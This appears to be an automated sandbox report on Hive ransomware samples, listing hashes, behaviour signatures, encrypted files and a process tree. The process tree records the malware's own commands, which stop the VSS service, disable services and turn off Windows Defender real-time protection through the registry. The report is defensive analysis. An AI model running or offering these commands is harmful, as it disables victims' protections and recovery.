Overview
overview
10Static
static
7Ransomware.Hive.zip
windows7-x64
1Ransomware.Hive.zip
windows10-1703-x64
1211xahcou.exe
windows7-x64
10211xahcou.exe
windows10-1703-x64
10Hive.elf
windows7-x64
3Hive.elf
windows10-1703-x64
3hive.exe
windows7-x64
10hive.exe
windows10-1703-x64
10hive_linux_elf
windows7-x64
1hive_linux_elf
windows10-1703-x64
1linux_hive.elf
windows7-x64
3linux_hive.elf
windows10-1703-x64
3sjl8j6ap3.exe
windows7-x64
1sjl8j6ap3.exe
windows10-1703-x64
1windows_25...c5.exe
windows7-x64
10windows_25...c5.exe
windows10-1703-x64
10zi1ysv64h.exe
windows7-x64
10zi1ysv64h.exe
windows10-1703-x64
10Analysis
-
max time kernel
291s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
12-02-2024 06:38
Behavioral task
behavioral1
Sample
Ransomware.Hive.zip
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Ransomware.Hive.zip
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
211xahcou.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
211xahcou.exe
Resource
win10-20231215-en
Behavioral task
behavioral5
Sample
Hive.elf
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
Hive.elf
Resource
win10-20231215-en
Behavioral task
behavioral7
Sample
hive.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
hive.exe
Resource
win10-20231215-en
Behavioral task
behavioral9
Sample
hive_linux_elf
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
hive_linux_elf
Resource
win10-20231215-en
Behavioral task
behavioral11
Sample
linux_hive.elf
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
linux_hive.elf
Resource
win10-20231215-en
Behavioral task
behavioral13
Sample
sjl8j6ap3.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
sjl8j6ap3.exe
Resource
win10-20231215-en
Behavioral task
behavioral15
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win10-20231215-en
Behavioral task
behavioral17
Sample
zi1ysv64h.exe
Resource
win7-20231215-en
General
-
Target
zi1ysv64h.exe
-
Size
3.3MB
-
MD5
5384c6825a5707241c11d78529dbbfee
-
SHA1
85f5587e8ad534c2e5de0e72450b61ebda93e4fd
-
SHA256
3858e95bcf18c692f8321e3f8380c39684edb90bb622f37911144950602cea21
-
SHA512
856861295efb9c1b0000b369297cf6905a277c2d7dd0bc238f3884cd22598055450bf0459d68441f135bb77150685a86707ea9320a37e10548b40185f09b961f
-
SSDEEP
49152:HJ9mQ5uetkErb/TKvO90dL3BmAFd4A64nsfJ+9NRUMZXuPH9fc0KHPKG/g+eNgiz:HJ9jkl9NbBo9fc0KHYno
Malware Config
Extracted
C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\K8zJ_HOW_TO_DECRYPT.txt
hive
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1728 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid process 1576 wevtutil.exe 1336 wevtutil.exe 2400 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2072 bcdedit.exe 1748 bcdedit.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1384 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
zi1ysv64h.exedescription ioc process File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\css\slideShow.css zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01170_.WMF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_Ho2AnTeylDg0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00837_.WMF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_pRTGSXbtcqs0.2o4xo zi1ysv64h.exe File created C:\Program Files\Microsoft Games\Hearts\de-DE\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\tipresx.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Spades\it-IT\shvlzm.exe.mui.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_dt-sQGCveuY0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14790_.GIF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_Ll163bxmKHs0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18232_.WMF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_1x3HqOrzz5w0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_tPiM05_6YtI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_h.png zi1ysv64h.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\css\settings.css zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195320.WMF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_5mdhaY3VWz00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10264_.GIF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_8OkBgRmTYZc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsrom.xml zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Iqaluit.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_yrHQwz5NFwc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_0mKFGwwn24c0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_BpMSXjI4-tI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\CGMIMP32.FLT.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_chz7TxMFZQg0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCHKBRD.XML.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_zYybOsHjM9Y0.2o4xo zi1ysv64h.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RADIAL\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_17ciroWOtLs0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr__aPx1SoUnnw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00687_.WMF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_D9eGxte5by80.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_1_qi0tWsNGc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Danmarkshavn.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_NbaojMmhS0E0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_uNZ7ljFgw4I0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_aNDjlozo6WA0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\TipBand.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0183172.WMF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_D5TuOoN88eQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK.DEV_K_COL.HXK.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_R2s8zu7HT8o0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_uPElUYSWEDc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTORE_COL.HXT.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_1g6KKI9426M0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_XRAiUX1MwDc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_uk2oSu8Dzh40.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_nW4Tjdmr4bQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_s.png zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00454_.WMF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_owYL8Q7qNW00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN026.XML.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_Hp-pr-7RhqQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_TfODbjJ8tgY0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_zxxi0TUwJyg0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\TAB_OFF.GIF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_j8H8IEqtILo0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIcons.jpg.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_U7HXmyZg2W00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\JUNGLE.HTM.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_CwmxjMvaw180.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_UdIcgQQ7D_80.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_wc1g5s390B40.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_C2hXB6Av9Yg0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_X3TunW8ZHXQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\HEADER.GIF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr__o8LM3N7ssE0.2o4xo zi1ysv64h.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_G3auiDaZmnk0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00685_.WMF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_Z2GVeHKvPcY0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\HEADER.GIF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_E9wnm8Fhb8Q0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02417_.WMF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_NPp9bhopc4o0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01560_.WMF.Xsxc-YsGQTPTvSVeAKru0XJbOAShIKqDRdjXwPLsUsr_7kC1gVa3q000.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\localizedStrings.js zi1ysv64h.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\K8zJ_HOW_TO_DECRYPT.txt zi1ysv64h.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_SelectionSubpicture.png zi1ysv64h.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2700 sc.exe 2812 sc.exe 1764 sc.exe 1032 sc.exe 2332 sc.exe 3024 sc.exe 2656 sc.exe 2596 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 444 vssadmin.exe -
Modifies registry class 1 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000_Classes\Local Settings rundll32.exe -
Opens file in notepad (likely ransom note) 2 IoCs
Processes:
notepad.exeNOTEPAD.EXEpid process 1280 notepad.exe 3036 NOTEPAD.EXE -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exenet1.exezi1ysv64h.exepid process 3064 powershell.exe 2720 net1.exe 2252 zi1ysv64h.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 2400 wevtutil.exe Token: SeBackupPrivilege 2400 wevtutil.exe Token: SeSecurityPrivilege 1336 wevtutil.exe Token: SeBackupPrivilege 1336 wevtutil.exe Token: SeSecurityPrivilege 1576 wevtutil.exe Token: SeBackupPrivilege 1576 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1364 wmic.exe Token: SeSecurityPrivilege 1364 wmic.exe Token: SeTakeOwnershipPrivilege 1364 wmic.exe Token: SeLoadDriverPrivilege 1364 wmic.exe Token: SeSystemProfilePrivilege 1364 wmic.exe Token: SeSystemtimePrivilege 1364 wmic.exe Token: SeProfSingleProcessPrivilege 1364 wmic.exe Token: SeIncBasePriorityPrivilege 1364 wmic.exe Token: SeCreatePagefilePrivilege 1364 wmic.exe Token: SeBackupPrivilege 1364 wmic.exe Token: SeRestorePrivilege 1364 wmic.exe Token: SeShutdownPrivilege 1364 wmic.exe Token: SeDebugPrivilege 1364 wmic.exe Token: SeSystemEnvironmentPrivilege 1364 wmic.exe Token: SeRemoteShutdownPrivilege 1364 wmic.exe Token: SeUndockPrivilege 1364 wmic.exe Token: SeManageVolumePrivilege 1364 wmic.exe Token: 33 1364 wmic.exe Token: 34 1364 wmic.exe Token: 35 1364 wmic.exe Token: SeIncreaseQuotaPrivilege 2964 wmic.exe Token: SeSecurityPrivilege 2964 wmic.exe Token: SeTakeOwnershipPrivilege 2964 wmic.exe Token: SeLoadDriverPrivilege 2964 wmic.exe Token: SeSystemProfilePrivilege 2964 wmic.exe Token: SeSystemtimePrivilege 2964 wmic.exe Token: SeProfSingleProcessPrivilege 2964 wmic.exe Token: SeIncBasePriorityPrivilege 2964 wmic.exe Token: SeCreatePagefilePrivilege 2964 wmic.exe Token: SeBackupPrivilege 2964 wmic.exe Token: SeRestorePrivilege 2964 wmic.exe Token: SeShutdownPrivilege 2964 wmic.exe Token: SeDebugPrivilege 2964 wmic.exe Token: SeSystemEnvironmentPrivilege 2964 wmic.exe Token: SeRemoteShutdownPrivilege 2964 wmic.exe Token: SeUndockPrivilege 2964 wmic.exe Token: SeManageVolumePrivilege 2964 wmic.exe Token: 33 2964 wmic.exe Token: 34 2964 wmic.exe Token: 35 2964 wmic.exe Token: SeIncreaseQuotaPrivilege 2964 wmic.exe Token: SeSecurityPrivilege 2964 wmic.exe Token: SeTakeOwnershipPrivilege 2964 wmic.exe Token: SeLoadDriverPrivilege 2964 wmic.exe Token: SeSystemProfilePrivilege 2964 wmic.exe Token: SeSystemtimePrivilege 2964 wmic.exe Token: SeProfSingleProcessPrivilege 2964 wmic.exe Token: SeIncBasePriorityPrivilege 2964 wmic.exe Token: SeCreatePagefilePrivilege 2964 wmic.exe Token: SeBackupPrivilege 2964 wmic.exe Token: SeRestorePrivilege 2964 wmic.exe Token: SeShutdownPrivilege 2964 wmic.exe Token: SeDebugPrivilege 2964 wmic.exe Token: SeSystemEnvironmentPrivilege 2964 wmic.exe Token: SeRemoteShutdownPrivilege 2964 wmic.exe Token: SeUndockPrivilege 2964 wmic.exe Token: SeManageVolumePrivilege 2964 wmic.exe Token: 33 2964 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
zi1ysv64h.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2252 wrote to memory of 1456 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 1456 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 1456 2252 zi1ysv64h.exe net.exe PID 1456 wrote to memory of 2676 1456 net.exe net1.exe PID 1456 wrote to memory of 2676 1456 net.exe net1.exe PID 1456 wrote to memory of 2676 1456 net.exe net1.exe PID 2252 wrote to memory of 2424 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 2424 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 2424 2252 zi1ysv64h.exe net.exe PID 2424 wrote to memory of 2732 2424 net.exe net1.exe PID 2424 wrote to memory of 2732 2424 net.exe net1.exe PID 2424 wrote to memory of 2732 2424 net.exe net1.exe PID 2252 wrote to memory of 2292 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 2292 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 2292 2252 zi1ysv64h.exe net.exe PID 2292 wrote to memory of 2824 2292 net.exe net1.exe PID 2292 wrote to memory of 2824 2292 net.exe net1.exe PID 2292 wrote to memory of 2824 2292 net.exe net1.exe PID 2252 wrote to memory of 2832 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 2832 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 2832 2252 zi1ysv64h.exe net.exe PID 2832 wrote to memory of 2828 2832 net.exe cmd.exe PID 2832 wrote to memory of 2828 2832 net.exe cmd.exe PID 2832 wrote to memory of 2828 2832 net.exe cmd.exe PID 2252 wrote to memory of 2744 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 2744 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 2744 2252 zi1ysv64h.exe net.exe PID 2744 wrote to memory of 2720 2744 net.exe net1.exe PID 2744 wrote to memory of 2720 2744 net.exe net1.exe PID 2744 wrote to memory of 2720 2744 net.exe net1.exe PID 2252 wrote to memory of 1160 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 1160 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 1160 2252 zi1ysv64h.exe net.exe PID 1160 wrote to memory of 2748 1160 net.exe net1.exe PID 1160 wrote to memory of 2748 1160 net.exe net1.exe PID 1160 wrote to memory of 2748 1160 net.exe net1.exe PID 2252 wrote to memory of 2820 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 2820 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 2820 2252 zi1ysv64h.exe net.exe PID 2820 wrote to memory of 2672 2820 net.exe net1.exe PID 2820 wrote to memory of 2672 2820 net.exe net1.exe PID 2820 wrote to memory of 2672 2820 net.exe net1.exe PID 2252 wrote to memory of 2908 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 2908 2252 zi1ysv64h.exe net.exe PID 2252 wrote to memory of 2908 2252 zi1ysv64h.exe net.exe PID 2908 wrote to memory of 2764 2908 net.exe net1.exe PID 2908 wrote to memory of 2764 2908 net.exe net1.exe PID 2908 wrote to memory of 2764 2908 net.exe net1.exe PID 2252 wrote to memory of 2812 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 2812 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 2812 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 2700 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 2700 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 2700 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 2596 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 2596 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 2596 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 2656 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 2656 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 2656 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 3024 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 3024 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 3024 2252 zi1ysv64h.exe sc.exe PID 2252 wrote to memory of 2332 2252 zi1ysv64h.exe sc.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2832
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1160
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:2812
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2444
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2916
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2912
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1992
-
-
